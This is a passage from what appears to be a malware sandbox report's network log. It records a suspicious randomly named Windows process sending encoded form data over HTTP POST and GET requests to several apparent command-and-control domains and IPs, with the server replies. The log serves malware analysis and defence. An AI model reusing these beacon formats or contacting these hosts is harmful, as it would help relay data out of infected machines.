            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.liangyuen528.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 76 67 67 45 65 62 73 6b 4c 4e 51 2b 5a 4a 31 77 66 65 79 6c 51 58 62 74 67 6e 53 46 6d 78 69 52 50 35 59 6c 36 30 55 6b 64 35 4d 51 39 51 76 76 55 49 45 76 59 37 62 52 61 6b 69 35 2b 2b 36 76 71 63 6b 51 45 62 52 73 73 41 62 38 53 51 67 4b 58 54 41 34 4a 57 46 53 37 76 6e 4a 4d 37 31 61 46 37 63 67 6c 52 4a 65 38 37 44 56 47 75 47 57 77 6a 5a 4e 58 44 6b 61 4c 47 46 70 43 59 36 6d 7a 6b 49 56 79 5a 51 76 79 42 6e 6f 38 33 62 33 6f 59 38 45 53 55 59 75 34 74 6a 79 47 58 58 32 6d 72 6f 67 57 78 61 68 58 59 72 65 56 53 51 55 37 50 4f 52 6e 73 58 71 61 54 48 4b 50 46 7a 41 62 73 62 2b 45 4e 72 78 31 51 42 32 59 4b 7a 47 6e 43 44 52 4b 4c 74 34 50 33 77 57 56 4b 46 6d 2f 77 3d 3d
            Data Ascii: blWd=vggEebskLNQ+ZJ1wfeylQXbtgnSFmxiRP5Yl60Ukd5MQ9QvvUIEvY7bRaki5++6vqckQEbRssAb8SQgKXTA4JWFS7vnJM71aF7cglRJe87DVGuGWwjZNXDkaLGFpCY6mzkIVyZQvyBno83b3oY8ESUYu4tjyGXX2mrogWxahXYreVSQU7PORnsXqaTHKPFzAbsb+ENrx1QB2YKzGnCDRKLt4P3wWVKFm/w==


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            23192.168.2.64975115.197.172.60805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:52:22.081341982 CEST1826OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.liangyuen528.com
            Origin: http://www.liangyuen528.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.liangyuen528.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 76 67 67 45 65 62 73 6b 4c 4e 51 2b 5a 4a 31 77 66 65 79 6c 51 58 62 74 67 6e 53 46 6d 78 69 52 50 35 59 6c 36 30 55 6b 64 35 55 51 39 6a 33 76 56 70 45 76 5a 37 62 52 5a 6b 69 43 2b 2b 36 32 71 63 4d 55 45 62 74 38 73 43 7a 38 53 79 6f 4b 52 69 41 34 51 6d 46 53 32 50 6e 55 54 72 30 43 46 37 4d 6b 6c 52 5a 65 38 37 44 56 47 76 32 57 35 57 74 4e 56 44 6b 64 4d 47 45 6f 51 6f 36 4f 7a 6b 41 46 79 5a 45 2f 7a 77 48 6f 2f 57 72 33 37 38 63 45 4b 45 59 6f 39 74 6a 36 47 58 62 39 6d 72 30 57 57 79 47 4c 58 59 50 65 58 53 56 52 70 4d 4b 78 39 4f 4b 48 45 6a 54 33 50 68 6a 76 56 4e 54 53 58 66 2f 52 36 45 56 4a 64 64 50 6b 6c 54 36 76 47 34 64 49 41 77 63 42 44 35 4a 72 70 38 57 50 62 47 53 73 63 39 56 35 61 59 51 57 64 6b 6f 31 5a 54 46 4e 37 6e 33 6f 75 4e 52 6f 64 66 7a 2f 34 77 57 73 73 2f 4c 52 7a 31 52 4e 76 34 36 32 76 43 42 36 45 6d 43 6e 6d 4e 44 64 62 31 54 43 50 59 52 55 32 38 6d 6b 6a 45 52 76 38 74 2f 48 70 4d 38 54 6f 6c 7a 61 76 64 66 42 52 4e 58 42 41 70 4c 76 53 46 57 61 6e [TRUNCATED]
            Data Ascii: blWd=vggEebskLNQ+ZJ1wfeylQXbtgnSFmxiRP5Yl60Ukd5UQ9j3vVpEvZ7bRZkiC++62qcMUEbt8sCz8SyoKRiA4QmFS2PnUTr0CF7MklRZe87DVGv2W5WtNVDkdMGEoQo6OzkAFyZE/zwHo/Wr378cEKEYo9tj6GXb9mr0WWyGLXYPeXSVRpMKx9OKHEjT3PhjvVNTSXf/R6EVJddPklT6vG4dIAwcBD5Jrp8WPbGSsc9V5aYQWdko1ZTFN7n3ouNRodfz/4wWss/LRz1RNv462vCB6EmCnmNDdb1TCPYRU28mkjERv8t/HpM8TolzavdfBRNXBApLvSFWanvw114cB4cUcKFmXik0jW9n0PdAnvswUY7/Qjff1VtHq8q0sA4p7yq1lEy+WHGDhX5HgbVAoigySwvvv7O70QBx6CflCAiO6/nYrk8uNDyZGSSnjRWUnzazmqOt+GtqwWGd3zTEGhzGVIuqsIveJwyb78IREtAWd3lTyVrqUs0ejk//4hb1/7m1seU5xEZCLn4jLMXgKcXWfBWR49h8kGeio0IHMrOJkY1hvNPX513kTa2RABaeszlUlAfp2OXLS7odx+n2fhMcdamP9XektedJXhjMCvSbPGpPO3IweHStAa5zvsHZPfH7QJkZEcbNXpMRbQ8E/PZjRoSh5AQzB/EVBNeP+B2qCU271qcBm64J7YEyFeWvAN6sDccBmEF3tyd8+w0mw0rCCcdZDYt5FkGkpVEBAy5eIelssM4OwMLFcJ9EL21dyymgI73ZeZDZBovifuazEeqibEVzTzmjE72nQFKh6k1dCU+MkiqwciyUH9nlAP1P91fIFYx/QiWO3RsrXz8CV8FjS1CVdj0pNFvJUlxw/hypZLRKxBAA2OpLo6ktOSejIL4rOG9C0A0gIYNsVezFe0N57p8lL5gA6G9UOc4XdZ1rpK/cr7YMWaGH7YNTxlbm1AqSkJKCQz++kuZcvIcUQ7CAdcfyuye/Fu9q0N79FYzJ0QBD [TRUNCATED]


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            24192.168.2.64975215.197.172.60805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:52:24.615874052 CEST527OUTGET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.liangyuen528.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:52:25.093091965 CEST414INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 02 Aug 2024 11:52:25 GMT
            Content-Type: text/html
            Content-Length: 274
            Connection: close
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 78 65 3d 41 70 71 34 74 50 50 58 4e 64 54 70 32 26 62 6c 57 64 3d 69 69 49 6b 64 72 42 36 4b 59 63 56 51 6f 4e 30 63 36 43 66 5a 6e 69 49 2b 6c 4b 31 37 77 6d 55 53 4f 63 34 31 79 4d 31 51 2f 6b 39 37 6a 69 4a 63 6f 6b 75 57 50 62 4f 54 78 69 43 6f 64 47 57 69 4f 51 6b 55 72 70 32 31 6c 33 37 65 79 4d 65 4c 54 70 2b 52 46 6b 7a 2b 34 62 7a 44 65 45 4b 4b 71 52 5a 67 41 52 36 71 6f 54 49 4c 74 4f 4c 36 45 64 4a 5a 68 4a 5a 42 6e 46 64 53 50 4f 72 33 30 49 30 32 4d 38 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ixe=Apq4tPPXNdTp2&blWd=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8="}</script></head></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            25192.168.2.64975366.29.149.46805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:52:30.152224064 CEST786OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.techchains.info
            Origin: http://www.techchains.info
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.techchains.info/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 74 71 7a 62 69 56 74 64 67 41 4d 61 68 6b 63 31 58 46 58 6a 46 4e 53 73 7a 55 6d 75 62 7a 39 48 6b 53 50 39 73 4e 6b 41 59 54 57
            Data Ascii: blWd=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXItqzbiVtdgAMahkc1XFXjFNSszUmubz9HkSP9sNkAYTW
            Aug 2, 2024 13:52:30.815274000 CEST637INHTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:30 GMT
            Server: Apache
            Content-Length: 493
            Connection: close
            Content-Type: text/html
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            26192.168.2.64975666.29.149.46805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:52:32.696614981 CEST810OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.techchains.info
            Origin: http://www.techchains.info
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.techchains.info/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 74 51 73 78 4d 55 75 37 7a 58 46 6b 71 50 76 37 42 44 50 73 32 31 61 64 53 4f 32 35 32 66 72 47 63 45 4c 57 46 53 66 35 61 59 71 77 3d 3d
            Data Ascii: blWd=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVtQsxMUu7zXFkqPv7BDPs21adSO252frGcELWFSf5aYqw==
            Aug 2, 2024 13:52:33.360078096 CEST637INHTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:33 GMT
            Server: Apache
            Content-Length: 493
            Connection: close
            Content-Type: text/html
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            27192.168.2.64975766.29.149.46805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:52:35.245125055 CEST1823OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.techchains.info
            Origin: http://www.techchains.info
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.techchains.info/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 30 5a 31 79 31 4d 79 36 68 4d 2f 74 4e 50 62 42 6b 57 4b 67 36 6b 30 57 39 43 68 53 39 58 52 2b 37 33 2f 71 56 59 78 49 79 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4c 47 41 37 30 34 44 55 69 68 38 49 33 67 74 6f 6b 32 42 34 6b 32 2b 74 4d 6e 77 59 73 75 2b 63 50 71 48 46 67 57 37 55 4a 4c 63 46 50 73 32 4a 52 65 73 48 2f 41 6f 64 63 65 67 61 43 4e 37 68 68 6f 75 43 35 5a 70 4a 45 73 48 45 69 58 37 63 67 57 [TRUNCATED]
            Data Ascii: blWd=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNnYWDz8Fx0Z1y1My6hM/tNPbBkWKg6k0W9ChS9XR+73/qVYxIy0RRMzs2A+OpjvuIMBLorVk6oFP6Xprm6vLGA704DUih8I3gtok2B4k2+tMnwYsu+cPqHFgW7UJLcFPs2JResH/AodcegaCN7hhouC5ZpJEsHEiX7cgW7zuI60JeSi7X7an0pH15nEFNZASgOVRwKFkrNaE1wyZPPVcoETqEHFkiwQyoFxywvqC0x98C7vphzvMl4UgECr9egoFU931MrywlRSAvRkl0e8P11lRLj7GV76LpQF0Pibup/5EyCNfcqy3KyNvNQlrDySsuHSTnzn35//5EHg1Id9+xzb3N84ccRPci1sr11Sz1pxot0S1pzvIHPROmGpe/8E0AaJDSwmVzRef/T9hjapGA6qGEEDpeKNE5ez26JQFhPh5i9e+fT3yM9O8mqm12VMElzf+AfzUE530juFIlx6+dECOKyNlB2PpiPuOQi6iQXCgjxsCMuQyXyVkr33be3+V8yLwPjwsZ289Nr/FmWE4+zL/YgH9bJtGFY0u0sdyjWxeNX8j8mvAVJ97iJRUthMq3ithoqoWSmVpgo9LFAiXV+3ATFfTUp3M/ORdIL9W5HMEMYRQdrBC4xm7TOamhSpoJEOTq0vwLGb6ca/n8JXcuO0IG5Q6M4u4aa46BD16QyGPHviBQfNYSnFlpqI45i3PHCfdSuQdg89HWvbTyICgg/Zx6i5NjktnT7vfwIJ4eVtFbR6uYzM2Ytvr74YSLms1pfePUvoLxo0pFFKtcZXCBBCKQHqbVOEjBevjoA8SSOXD4v/RgXxjFG4JN1IW4EJ+TWbxUSQ [TRUNCATED]
            Aug 2, 2024 13:52:35.869472980 CEST637INHTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:35 GMT
            Server: Apache
            Content-Length: 493
            Connection: close
            Content-Type: text/html
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            28192.168.2.64975866.29.149.46805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:52:37.786711931 CEST526OUTGET /fo8o/?blWd=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.techchains.info
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:52:38.430005074 CEST652INHTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:38 GMT
            Server: Apache
            Content-Length: 493
            Connection: close
            Content-Type: text/html; charset=utf-8
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            29192.168.2.649759195.110.124.133805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:52:43.545048952 CEST804OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.elettrosistemista.zip
            Origin: http://www.elettrosistemista.zip
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.elettrosistemista.zip/fo8o/
